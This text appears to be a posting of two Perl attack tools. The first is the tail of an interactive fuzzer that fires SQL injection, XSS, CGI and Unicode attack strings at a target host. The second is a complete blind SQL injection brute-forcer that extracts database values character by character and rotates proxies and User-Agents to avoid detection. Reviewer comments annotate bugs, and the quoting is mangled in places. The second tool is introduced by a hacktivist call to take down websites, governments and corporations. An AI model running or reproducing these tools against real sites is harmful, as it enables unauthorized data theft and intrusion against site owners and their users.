my @options = (“1)MySql Fuzz?\n”,”2)MSSQL Fuzz?\n”,”3)XSS fuzz?\n”,”4)CGI Fuzz?\n”,”5)Unicode Fuzz?\n”,”6)General Fuzz?\n”,
               “7)Fuck it, throw it all at it and lets see what happens,lol\n”);

# Interactive menu, then one GET request per string in the chosen list,
# built as $host.$string. Responses with code below 400 are appended raw to
# goodcodes.htm, responses 400 and above to badcodes.htm (after which the
# script exits).
# Defender notes: a burst of GETs against one host whose paths carry the
# strings from the lists above is a straightforward WAF/IDS signature.
# NOTE(review): ‘Skid-Bot’ is passed as the sole argument to
# LWP::UserAgent->new; whether it is actually emitted as the User-Agent header
# depends on how that constructor treats a single positional argument —
# confirm before relying on it as an indicator. The saved files contain the
# server's raw HTML, so the author's warning about opening them stands.
print “***************************************************************************\n”;
print ”                              Perl Fuzzer                                  \n”;
print “***************************************************************************\n”;
print “General attack fuzzer. Perl Fuzzer sends attack strings then outputs the   \n”;
print “the results to an html file. The html files are named goodcode.html or     \n”;
print “badcodes.html depending on server response.You are receiving actual html   \n”;
print “code from the server once opening the file so XSS tends to fire off.All attack\n”;
print “responses will be returned to you in the way it would\’ve live in the browser.\n”;
print “all at once so keep this in mind. Also, be careful running a full scan unless\n”;
print “your system has a decent amount of memory. Opening the large html file can eat\n”;
print “up a large amount of memory. Smaller computers should stick with the single   \n”;
print “scan modes. Have fun 😀                                                       \n”;
print “*****************************************************************************\n”;
print “********Unauthorized scanning is illegal and I take no responsibility********\n”;
print “*****************************************************************************\n”;
foreach my $options(@options){
               print $options,”\n”;
}
print “Scan Type? 1-7:\n”;
my $res = <STDIN>;
chomp $res;

   # Each branch below is the same request/record loop over a different list.
   if($res =~ /1/){
   foreach my $scan(@MYSQL){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending MYSQL attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /2/){
   foreach my $scan(@MSSQL){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending MSSQL attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /3/){
     foreach my $scan(@XSS){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending XSS attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /4/){
     foreach my $scan(@CGIs){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending CGI attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /5/){
      foreach my $scan(@Unicode){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending Unicode attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /6/){
      foreach my $scan(@Fuzzer){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending General attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /7/){
      # Combined run over the lists named here (the highest request volume).
      foreach my $scan(@MSSQL,@MSSQL,@XSS,@Unicode,@CGIs){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending All attack strings..This going to get is noisy!\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}
}}else{
   print “Error! Check the options and try again\n”;
}
# Opens (or re-opens) goodcodes.htm for append on the global handle FG; the
# open result is not checked.
sub openg{
  open(FG, “>>goodcodes.htm”);
}
# Opens (or re-opens) badcodes.htm for append on the global handle FB; the
# open result is not checked.
sub openb{
  open(FB, “>>badcodes.htm”);
}

Blind SQL Injection Bruteforcer

Greetings Anons!

Our revolution has suffered much as of late, and it is necessary to step up our offensive methods. Defense is no longer the only option by which we can stick. We need to attack and take down oppressive websites, governments, and corporations worldwide. Below I have written a perl script for a blind sql bruteforcer. Enjoy and use with great fervor! Stay strong!

 

#!/usr/bin/perl
# Blind SQL Injection POC.omicronhatemail@gmail.com // TheRoyalAnon

use LWP::UserAgent;
use Getopt::Long;
use strict;

###############################################################################
# Fallback values applied further down when the matching option is absent.
# NOTE(review): the quoting in this listing is mangled (\” for ", \’ for ');
# it is reproduced as found and must be restored before the script compiles.
my $default_debug = 0;                          # -debug off
my $default_length = 32;                        # -length: stop after this many characters
my $default_method = \”GET\”;                    # -method: "GET" or "POST"
my $default_time = \”0\”;                        # -time 0: no delay between requests (see fetch)
my $version = \”1.1\”;
my $default_useragent = \”bsqlbf $version\”;     # -uagent: identifies the tool by name in every request
my $default_dict = \”dict.txt\”;                 # -dict: file slurped into @dic before the main loop
my $default_sql = \”version()\”;                 # -sql: expression whose value is recovered
###############################################################################

$| = 1;   # unbuffer STDOUT so the "\r trying: ..." progress line redraws in place

# Script-wide state shared by the main loop and the subs below.
my ($args, $abc, $solution);            # $abc: current candidate alphabet; $solution: value recovered so far ($args unused here)
my ($string, $char, @dic);              # $string: injected clause; $char: candidate code point; @dic: -dict lines
my (%vars, @varsb);                     # query parameters name => value, and the names in URL order
my ($lastvar, $lastval);                # parameter that receives the injection, and its original value
my ($scheme, $authority, $path, $query, $fragment);   # filled by parseurl()
my $hits = 0;                            # number of requests sent (reported by result())
my $usedict = 0;                         # dictionary-derived alphabet in use, 0 when none
my $amatch = 0;                          # 1 when the match string was auto-detected by fmatch()
my ($ua,$req);                           # LWP::UserAgent built by createlwp(); $req is not used in this listing

###############################################################################
# Define GetOpt:
# Command-line options. All are strings except -time (integer) and the two
# boolean switches (-help / -debug, negatable with --no...). -rproxy / -ruagent
# name files of candidate proxies / User-Agents, one per line, '#' comments.
my ($url, $sql, $time, $rtime, $match, $uagent, $charset, $debug);
my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent); 
my ($dict, $start, $length, $method, $cookie,$blind);
my $help;

# NOTE(review): the GetOptions return value ($options) is never examined in
# this listing, so an unknown option is reported by Getopt::Long but the run
# continues anyway.
my $options = GetOptions (
  \’help!\’           => \\$help, 
  \’url=s\’            => \\$url,
  \’sql=s\’             => \\$sql,
  \’blind=s\’           => \\$blind,
  \’match=s\’             => \\$match,
  \’charset=s\’       => \\$charset,
  \’start=s\’             => \\$start,
  \’length=s\’       => \\$length,
  \’dict=s\’           => \\$dict,
  \’method=s\’       => \\$method,
  \’uagent=s\’       => \\$uagent,
  \’ruagent=s\’       => \\$ruagent,
  \’cookie=s\’       => \\$cookie,
  \’proxy=s\’          => \\$proxy,
  \’proxy_user=s\’     => \\$proxy_user,
  \’proxy_pass=s\’     => \\$proxy_pass,
  \’rproxy=s\’     => \\$rproxy,
  \’debug!\’           => \\$debug, 
  \’rtime=s\’           => \\$rtime, 
  \’time=i\’           => \\$time );

# -url is mandatory; help() exits.  ($help is undef unless -help was given.)
&help unless ($url);
&help if $help eq 1;

#########################################################################
# Default Options.
# charset() is called before any request has been made ($hits is 0), so this
# first alphabet always comes from chardefault().
$abc          = charset();
$uagent     ||= $default_useragent; 
$debug    ||= $default_debug; 
$length     ||= $default_length; 
$solution     ||= $start;     # seed the recovered value with a known prefix (-start)
$method     ||= $default_method;
$sql         ||= $default_sql;
$time         ||= $default_time;

# Build the HTTP agent first (it does not need the parsed URL), then split
# the URL into %vars / @varsb.
&createlwp();
&parseurl();

# Injection point: -blind names a query parameter; otherwise the last
# parameter in the URL is used. $lastval keeps its original value so the
# probe can be appended to it on every request.
if ( ! defined($blind)) {
        $lastvar = $varsb[$#varsb];
        $lastval = $vars{$lastvar};
} else {
        $lastvar = $blind;
        $lastval = $vars{$blind};
}

if (defined($cookie)) { &cookie() }

# Without -match, fmatch() sends two requests (AND 1=1 / AND 1=0) to find a
# line that distinguishes true from false responses. Note this network
# contact happens before the option summary below is printed.
if (!$match) {
    print \”\\nTrying to find a match string…\\n\” if $debug eq 1;
    $amatch = \”1\”;
    &auto_match();
}

&banner();
&httpintro();
&bsqlintro();
 
#########################################################################
# Define CHARSET to use. Dictionary /// (TODO: fix ugly code)

# -dict is read wholesale into @dic; charset() later mines it for candidates.
# NOTE(review): the open is unchecked and two-argument — a missing file
# silently leaves @dic empty (the fixed charset is then used throughout), and
# a -dict value beginning with '|' or '>' is taken as a pipe/mode rather than
# a file name.
$dict ||= $default_dict;
open DICT,\”$dict\”;  @dic=<DICT>; close DICT;

# Main extraction loop: $i is the 1-based character position inside the value
# of -sql, starting just after any prefix supplied with -start.
my $i;
my $nodict = 0;   # set once the dictionary alphabet missed at a position; never cleared in this listing
for ($i=length($start)+1;$i<=$length;$i++) {
    my $furl;
    my $find = 0;
    $abc = charset();   # dictionary-derived alphabet when available, else chardefault()
    &bsqlintro if $debug eq 1;
    print \”\\r trying: $solution \”;
    # One request per candidate character; the first candidate whose response
    # contains $match is accepted and the loop advances to the next position.
    foreach (split/ */,$abc) {
        $find = 0; 
        $char = ord();
        # Boolean probe in MySQL syntax (MID/CHAR); other engines need their
        # own substring/char functions, which this loop does not provide.
        $string = \” AND MID($sql,$i,1)=CHAR($char)\”;
        if (lc($method) eq \”post\”) {
           $vars{$lastvar} = $lastval . $string;   # fetch() posts %vars as the body
        }
        print \”\\x08$_\”;   # backspace over the previous candidate on the progress line
        $furl = $url;
        # NOTE(review): $lastvar/$lastval are interpolated unescaped into the
        # pattern and $string is spliced in without URL-encoding; a parameter
        # value containing regex metacharacters is not rewritten at all.
        $furl =~ s/($lastvar=$lastval)/$1$string/;
        &createlwp if $rproxy || $ruagent;   # rotate proxy / User-Agent per request
        my $html=fetch(\”$furl\”);
        $hits++;
        # fetch() returns the body regardless of HTTP status, so an error page
        # that happens to contain $match also counts as a hit.
        foreach (split(/\\n/,$html)) {
             if (/\\Q$match\\E/) { 
                my $asc=chr($char);
                $solution .= $asc;
                $find = 1;
             }
            last if $find eq \”1\”;
            }
        last if $find eq \”1\”;
    }
    # Dictionary miss: flag it and retry the same position with the default
    # alphabet (chardefault() strips the characters already tried).
    # NOTE(review): `$i–` is printed with an en-dash in this listing;
    # presumably `$i--` in the original, otherwise the position is skipped.
    if ($usedict ne 0 && $find eq 0) { $nodict=1; $i–; }
    # No dictionary in play and nothing matched: treat the value as ended.
    if ($find eq \”0\” && $usedict eq \”0\”) { last; };
}

&result();

#########################################################################
# Print the HTTP side of the run configuration (scheme, host, method, agent,
# path, parsed parameters, cookie, proxy). Output only; reads globals.
# NOTE(review): parameters are listed in hash order (keys %vars), so arg[N]
# numbering need not follow the URL; @varsb holds the URL order. The proxy
# password is deliberately not echoed. The leading "–[" is an en-dash in this
# listing, presumably "--[" in the original.
sub httpintro {
    my ($strcookie, $strproxy, $struagent, $i);
    print \”–[ http options ]\”; print \”-\”x62; print \”\\n\”;
    printf (\”%12s %-8s %11s %-20s\\n\”,\”schema:\”,$scheme,\”host:\”,$authority);
    # With -ruagent the file name is shown instead of the (already undef'd) agent.
    if ($ruagent) { $struagent=\”rnd:$ruagent\” } else { $struagent = $uagent }
    printf (\”%12s %-8s %11s %-20s\\n\”,\”method:\”,uc($method),\”useragent:\”,$struagent);
    printf (\”%12s %-50s\\n\”,\”path:\”, $path);
    foreach (keys %vars) {
        $i++;   # starts from undef, so the first parameter is arg[1]
        printf (\”%12s %-15s = %-40s\\n\”,\”arg[$i]:\”,$_,$vars{$_});
    }
    if (! $cookie) { $strcookie=\”(null)\” } else { $strcookie = $cookie; }
    printf (\”%12s %-50s\\n\”,\”cookies:\”,$strcookie);
    if (! $proxy && !$rproxy) { $strproxy=\”(null)\” } else { $strproxy = $proxy; }
    if ($rproxy) { $strproxy = \”rnd:$rproxy\” }
    printf (\”%12s %-50s\\n\”,\”proxy_host:\”,$strproxy);
    if (! $proxy_user) { $strproxy=\”(null)\” } else { $strproxy = $proxy_user; }
    printf (\”%12s %-50s\\n\”,\”proxy_user:\”,$strproxy);
}

# Print the injection side of the run configuration: parameter, -start
# prefix, -length, -sql, the current alphabet ($abc) and the match string.
# Also called once per position when -debug is on (see the main loop).
sub bsqlintro {
    my ($strstart, $strblind, $strlen, $strmatch, $strsql);
    print \”\\n–[ blind sql injection options ]\”; print \”-\”x47; print \”\\n\”;
    if (! $start) { $strstart = \”(null)\”; } else { $strstart = $start; }
    # "(last)" marks that the injection parameter was chosen by default.
    if (! $blind) { $strblind = \”(last) $lastvar\”; } else { $strblind = $blind; }
    printf (\”%12s %-15s %11s %-20s\\n\”,\”blind:\”,$strblind,\”start:\”,$strstart);
    if ($length eq $default_length) { $strlen = \”$length (default)\” } else { $strlen = $length; }
    if ($sql eq $default_sql) { $strsql = \”$sql (default)\”; } else { $strsql = $sql; }
    printf (\”%12s %-15s %11s %-20s\\n\”,\”length:\”,$strlen,\”sql:\”,$strsql);
    printf (\”%12s %-50s\\n\”,\”charset:\”,$abc);
    if ($amatch eq 1) { $strmatch = \”auto match:\” } else { $strmatch = \”match:\”; }
    #printf (\”%12s %-60s\\n\”,\”$strmatch\”,$match);
    print \” $strmatch $match\\n\”;
    print \”-\”x80; print \”\\n\\n\”;
}
#########################################################################

# (Re)build the global $ua. Called once at start-up and, when -rproxy or
# -ruagent is set, again before every request so the proxy / User-Agent can
# be rotated. Side effects: may reassign $proxy and $uagent (via getproxy /
# getuagent) and undefs them afterwards when rotation is on.
sub createlwp {
    my $proxyc;
    &getproxy;
    &getuagent;
    # NOTE(review): -debug is a boolean switch, so $debug is never greater
    # than 1 and this call cannot fire; LWP::Debug is also not loaded by a
    # `use` in this listing.
    LWP::Debug::level(\’+\’) if $debug gt 3;
    # Cookie jar file named after the PID in the working directory. Whether
    # received cookies are written back to it depends on HTTP::Cookies'
    # autosave default — confirm; nothing in this listing removes the file.
    $ua = new LWP::UserAgent(
        cookie_jar=> { file => \”$$.cookie\” }); 
    $ua->agent(\”$uagent\”);
    # Proxy credentials are embedded in the proxy URL as user:pass@host; the
    # URL is parsed with the same RFC 3986-style pattern as parseurl().
    if (defined($proxy_user) && defined($proxy_pass)) {
        my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
        $proxy =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\\?([^#]*))?(?:#(.*))?|; 
        $proxyc = $pscheme.\”://\”.$proxy_user.\”:\”.$proxy_pass.\”@\”.$pauthority;
    } else { $proxyc = $proxy; }
    
    # Only the http scheme is proxied; https targets would bypass the proxy.
    $ua->proxy([\’http\’] => $proxyc) if $proxy;
    # Clear the rotated values so the next call picks fresh ones; getproxy /
    # getuagent rely on this to tell a rotated value from a -proxy/-uagent one.
    undef $proxy if $rproxy;
    undef $uagent if $ruagent;
}    

# Sanity-check -cookie: every ';'-separated item must have a non-empty name
# and value around its first '='. Dies on a malformed item; otherwise a no-op
# (the cookie string itself is sent verbatim by fetch()).
# NOTE(review): the `||` makes the `/; /` test redundant, and `my ($a,$b)`
# masks Perl's sort variables — harmless here since nothing sorts inside.
sub cookie {
    # Cookies check
    if ($cookie || $cookie =~ /; /) {
        foreach my $c (split /;/, $cookie) {
            my ($a,$b) = split /=/, $c;
            if ( ! $a || ! $b ) { die \”Wrong cookie value. Use -h for help\\n\”; }
        }
    }
}

# Split -url into the five globals ($scheme, $authority, $path, $query,
# $fragment) and the query string into %vars (name => value) and @varsb
# (names in URL order, used to pick the default injection parameter).
# NOTE(review): values are not URL-decoded, `split /=/` keeps only the text
# between the first two '=' of a pair, and a repeated name keeps the last
# value while appearing twice in @varsb.
sub parseurl {
 ###############################################################################
 # Official Regexp to parse URI. Thank you somebody.
 # (This is the RFC 3986 Appendix B pattern.)
    ($scheme, $authority, $path, $query, $fragment) =
        $url =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\\?([^#]*))?(?:#(.*))?|; 
    # Parse args of URI into %vars and @varsb.
    foreach my $varval (split /&/, $query) {
        my ($var, $val) = split /=/, $varval;
        $vars{$var} = $val;
        push(@varsb, $var);
    }
}

# Return the alphabet to try at the current position. Once at least one
# request has been sent and the dictionary has not yet missed ($nodict is 0),
# the alphabet is mined from -dict: every non-comment line containing the
# current $solution contributes all of its remaining characters (first
# occurrence of $solution removed, spaces dropped, duplicates removed, in
# order of appearance). $usedict remembers that alphabet so chardefault()
# can exclude it on the retry. Falls back to chardefault() otherwise.
# NOTE(review): the dictionary match is unanchored, so a line containing
# $solution in the middle also contributes its leading characters; and since
# $nodict is never reset in this listing, the dictionary is abandoned for
# good after its first miss.
sub charset {
    if ($hits ne 0 && $nodict eq 0) {
        my (%tmp,@b,$foo); undef %tmp; undef @b; undef $abc;
        foreach my $line (@dic) {
            chomp $line; 
               if ($line =~ /\\Q$solution\\E/ && $line !~ /^#/) {
                $foo = $line; $foo =~ s/\\Q$solution\\E//;
                 foreach ((split/ */,$foo)) {
                      if ($tmp{$_} ne \”1\” ) {
                        $tmp{$_} = \”1\”; push (@b,$_);
                    }
                 }
            }
        }
            if ($#b >= 0) {
            foreach my $c (@b) { $abc .=$c;}
            $usedict = $abc;
            print \”\\nUsing a dictionary with this charset: $abc\\n\” if $debug eq 1;
         } else {
            $abc = chardefault()
         }
    } else {
            $abc = chardefault()
    }
    return $abc;
}

# Fixed alphabet selected by -charset: "md5" (hex plus "$."), "num", "all"
# (also the default), or any other string taken literally as a custom
# alphabet. If a dictionary alphabet was just tried ($usedict), its
# characters are removed so they are not probed twice; $usedict is then reset.
# NOTE(review): the "all" alphabet contains no upper-case letters, so values
# with capitals cannot be recovered with the default. Each $usedict character
# is used unescaped as a regex in `s/$_//`: '.' deletes the first character
# of $abc instead of itself, and '(' or '[' (both present in "all") make the
# substitution die — the pattern presumably wants \Q...\E. The "Âş"/"Âż"
# sequences look like UTF-8 mojibake of "º"/"¿"; confirm against the
# original. $tmp is unused.
sub chardefault {
    my $tmp;
    $abc = $charset;
    if (lc($charset) eq \”md5\”) {
        $abc = \”abcdef0123456789\\$.\”;
    } elsif (lc($charset) eq \”num\”) {
        $abc = \”0123456789\”;
    } elsif (lc($charset) eq \”all\” || ! $charset) {
           $abc = \”abcdefghijklmnopqrstuvwxyz0123456789\\$.-_()[]{}Âş@=/\\\\|#?Âż&·!<>ñÑ\”;
    }
    # If a dictionary has been used before, remove chars from current charset
    if ($usedict ne 0) {
        foreach (split(/ */, $usedict)) {
            $abc =~ s/$_//;
        }
    }
    $usedict = 0;
    return $abc;
}

# Derive the match string automatically by diffing a true and a false
# response for -url (see fmatch); stores the result in the global $match.
sub auto_match {
      $match = fmatch(\”$url\”);
}

#########################################################################
# Show options at running:
# Print the two-line program banner. Output only.
sub banner {
    print \”\\n // Blind SQL injection brute force.\\n\”;
    print \” // downloaded from securityoverride.com\\n\\n\”;
}

#########################################################################
# Get differences in HTML
# Find a line that distinguishes a true from a false response. Sends two
# requests — the injection parameter suffixed with " AND 1=1" and with
# " AND 1=0" — and returns the first non-blank line of the true response that
# does not appear anywhere in the false one. For POST the probe is placed in
# %vars (which fetch() posts) and the URL argument is passed through
# unchanged; %vars is restored afterwards.
# NOTE(review): if every line of the true response also occurs in the false
# one, the loop finishes with $ok = 1 and the LAST line is returned — every
# later probe then "matches" and the recovered value is meaningless. Pages
# with per-request dynamic content (timestamps, nonces) produce the opposite
# failure: the first differing line is noise, not the boolean signal. The
# GET substitution has the same unescaped-$lastval / no-URL-encoding caveat
# as the main loop.
sub fmatch {
 my ($ok,$rtrn);
 my ($furla, $furlb) = ($_[0], $_[0]);
 my ($html_a, $html_b);
 if (lc($method) eq \”get\”) {
    $furla =~ s/($lastvar=$lastval)/$1 AND 1=1/;
    $furlb =~ s/($lastvar=$lastval)/$1 AND 1=0/;
     $html_a = fetch(\”$furla\”);
    $html_b = fetch(\”$furlb\”);
 } elsif (lc($method) eq \”post\”) {
   $vars{$lastvar} = $lastval . \” AND 1=1\”;
   $html_a = fetch(\”$furla\”);
   $vars{$lastvar} = $lastval . \” AND 1=0\”;
   $html_b = fetch(\”$furla\”);
   $vars{$lastvar} = $lastval;
 }
 my @h_a = split(/\\n/,$html_a);
 my @h_b = split(/\\n/,$html_b);
 # Blank/whitespace-only lines are treated as present in both responses.
 foreach my $a (@h_a) {
    $ok = 0;
    if ($a =~ /\\w/) {
           foreach (@h_b) {
             if ($a eq $_) {$ok = 1; }
         }
     } else { $ok = 1; }
    $rtrn = $a;
    last if $ok ne 1;
 }
 return $rtrn;
}

#########################################################################
# Fetch HTML from WWW
# Perform one request and return the response body. Honours the -time delay
# (0 / 15 s / 300 s) or a random -rtime delay first. GET fetches the URL
# given as the argument (with -cookie sent as a Cookie header); POST ignores
# the argument, rebuilds scheme://host/path from the global $url and posts
# %vars as the form body. Dies on an unknown -method.
# NOTE(review): -rtime is broken as written — `m/(\d+-\d+)/` has a single
# capture group, so $l receives the whole "10-20" string and $p is undef,
# making rand() run on a negative range; the outer `/\d*-\d*/` test is also
# satisfied by any string containing '-'. Presumably `m/(\d+)-(\d+)/` was
# intended. A -time value other than 0/1/2 leaves $secs undefined (sleeps 0).
# The HTTP status is never checked: a connection failure or 5xx yields LWP's
# error page, which callers then scan for the match string like any other body.
sub fetch {
    my $secs;
    if ($time eq 0) { $secs = 0 }
    elsif ($time eq 1) { $secs = 15 }
    elsif ($time eq 2) { $secs = 300 }
    if ($rtime =~ /\\d*-\\d*/ && $time eq 0) {
        my ($l,$p) = $rtime =~ m/(\\d+-\\d+)/;
        srand; $secs = int(rand($p-$l+1))+$l;
    } elsif ($rtime =~ /\\d*-\\d*/ && $time ne 0) {
        print \”You can\’t run with -time and -rtime. See -help.\\n\”;
        exit 1;
    }
    sleep $secs;
    
    my $res;
    if (lc($method) eq \”get\”) {
        my $fetch = $_[0];
        if ($cookie) {
            $res = $ua->get(\”$fetch\”, Cookie => \”$cookie\”);
        } elsif (!$cookie) {
            $res = $ua->get(\”$fetch\”);
        }
    } elsif (lc($method) eq \”post\”) {
        # Same RFC 3986-style pattern as parseurl(); only scheme, authority
        # and path are reused — the original query string is dropped.
        my($s, $a, $p, $q, $f) =
          $url=~m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\\?([^#]*))?(?:#(.*))?|; 
        my $fetch = \”$s://$a\”.$p;
        if ($cookie) {
            $res = $ua->post(\”$fetch\”,\\%vars, Cookie => \”$cookie\”);
        } elsif (!$cookie) {
            $res = $ua->post(\”$fetch\”,\\%vars);
        }
    } else {
        die \”Wrong httpd method. Use -h for help\\n\”;
    }
    my $html = $res->content();
    return $html;
}

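sub getproxy {
    # Pick the proxy for this request (called from createlwp). With -rproxy,
    # one non-comment, non-blank line of the file is chosen at random on each
    # call; -proxy and -rproxy are mutually exclusive. createlwp() undefs
    # $proxy after use, so a value still present here can only have come from
    # the command line (or a previous rotation that was not consumed).
    # Changes from the original: three-argument open (a -rproxy value starting
    # with '|' or '>' is no longer interpreted as a pipe/mode), the chosen
    # line is chomped (the trailing newline previously became part of the
    # proxy URL), blank lines are skipped, and an empty list is an error
    # instead of silently yielding an undefined proxy.
    return unless $rproxy;
    if (defined($proxy) && $proxy =~ /http/) {
        print "You can't run with -proxy and -rproxy. See -help.\n";
        exit 1;
    }
    my @lproxy;
    open PROXY, '<', $rproxy or die "Can't open file: $rproxy\n";
    while (<PROXY>) {
        chomp;
        next if /^#/ || !/\S/;
        push(@lproxy, $_);
    }
    close PROXY;
    die "No usable proxy entries in $rproxy\n" unless @lproxy;
    srand;
    my $ind = rand @lproxy;   # float index; Perl truncates it when subscripting
    $proxy = $lproxy[$ind];
}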

# Pick the User-Agent for this request (called from createlwp). With
# -ruagent, one non-comment line of the file is chosen at random and stored
# in the global $uagent.
# NOTE(review): $uagent already holds the default "bsqlbf <version>" when
# createlwp() first runs, so `!~ /bsqlbf/` is false and the requests issued
# before the main loop (the auto-match pair) carry the default agent;
# createlwp() undefs $uagent when -ruagent is set, so the per-request calls
# in the loop do rotate. An explicit -uagent (no "bsqlbf" in it) makes the
# first test true and is silently overridden. The elsif repeats the identical
# `!~` test and is unreachable, so the -uagent/-ruagent conflict is never
# reported (compare getproxy, whose elsif tests `=~`). The chosen line keeps
# its trailing newline (no chomp); confirm how LWP emits a header value
# containing a newline. Two-argument open: a -ruagent value beginning with
# '|' or '>' is interpreted as a pipe/mode.
sub getuagent {
    if ($ruagent && $uagent !~ /bsqlbf/) {
        my @uproxy;
        open UAGENT, $ruagent or die \”Can\’t open file: $ruagent\\n\”;
        while(<UAGENT>) { push(@uproxy,$_) if ! /^#/ }
        close UAGENT;
        srand; my $ind = rand @uproxy;
        $uagent = $uproxy[$ind];
    } elsif ($ruagent && $uagent !~ /bsqlbf/)  {
        print \”You can\’t run with -uagent and -ruagent. See -help.\\n\”;
        exit 1;
    }
}

# Print the recovered value (if any) and the request count. In non-debug
# mode the line starts with "\r" to overwrite the progress line; in debug
# mode it starts on a fresh line. Note the value may be truncated: the main
# loop stops at the first position where no candidate matched.
sub result {
    print \”\\r results:                                  \\n\” .
     \” $sql = $solution\\n\” if length($solution) gt 0 and $debug eq 0;
    print \”\\n results:                                  \\n\” .
     \” $sql = $solution\\n\” if length($solution) gt 0 and $debug eq 1;
    print \” total hits: $hits\\n\”;
}

sub help {
    &banner();
    print \” usage: $0 <-url http://www.host.com/path/script.php?foo=bar&gt; [options]\\n\”;
    print \”\\n options:\\n\”;
    print \” -sql:\\t\\tvalid SQL syntax to get; connection_id(), database(),\\n\”;
    print \”\\t\\tsystem_user(), session_user(), current_user(), last_insert_id(),\\n\”; 
    print \”\\t\\tuser() or all data available in the requested query, for\\n\”;
    print \”\\t\\texample: user.password. Default: version()\\n\”;
    print \” -blind:\\tparameter to inject sql. Default is last value of url\\n\”;
    print \” -match:\\tstring to match in valid query, Default is try to get auto\\n\”;
    print \” -charset:\\tcharset to use. Default is all. Others charsets supported:\\n\”;
    print \” \\tall:\\tabcdefghijklmnopqrstuvwxyz0123456789\\$.-_()[]{}Âş@=/\\\\|#?Âż&·!<>ñÑ\\n\”;
    print \” \\tnum:\\t0123456789\\n\”;
    print \” \\tmd5:\\tabcdef0123456789\\$\\n\”;
    print \” \\tcustom:\\tyour custom charset, for example: \\\”abc0123\\\”\\n\”;
    print \” -start:\\tif you know the beginning of the string, use it.\\n\”;
    print \” -length:\\tmaximum length of value. Default is $default_length.\\n\”;
    print \” -dict:\\t\\tuse dictionary for improve speed. Default is dict.txt\\n\”;
    print \” -time:\\t\\ttimer options:\\n\”;
    print \” \\t0:\\tdont wait. Default option.\\n\”;
    print \” \\t1:\\twait 15 seconds\\n\”;
    print \” \\t2:\\twait 5 minutes\\n\”;
    print \” -rtime:\\twait random seconds, for example: \\\”10-20\\\”.\\n\”;
    print \” -method:\\thttp method to use; get or post. Default is $default_method.\\n\”;
    print \” -uagent:\\thttp UserAgent header to use. Default is $default_useragent\\n\”;
    print \” -ruagent:\\tfile with random http UserAgent header to use.\\n\”;
    print \” -cookie:\\thttp cookie header to use\\n\”;
    print \” -rproxy:\\tuse random http proxy from file list.\\n\”;
    print \” -proxy:\\tuse proxy http. Syntax: -proxy=http://proxy:port/\\n\”;
    print \” -proxy_user:\\tproxy http user\\n\”;
    print \” -proxy_pass:\\tproxy http password\\n\”;
    print \”\\n example:\\n bash# $0 -url http://www.somehost.com/blah.php?u=5 -blind u -sql \\\”user()\\\”\\n\”;
    exit(1);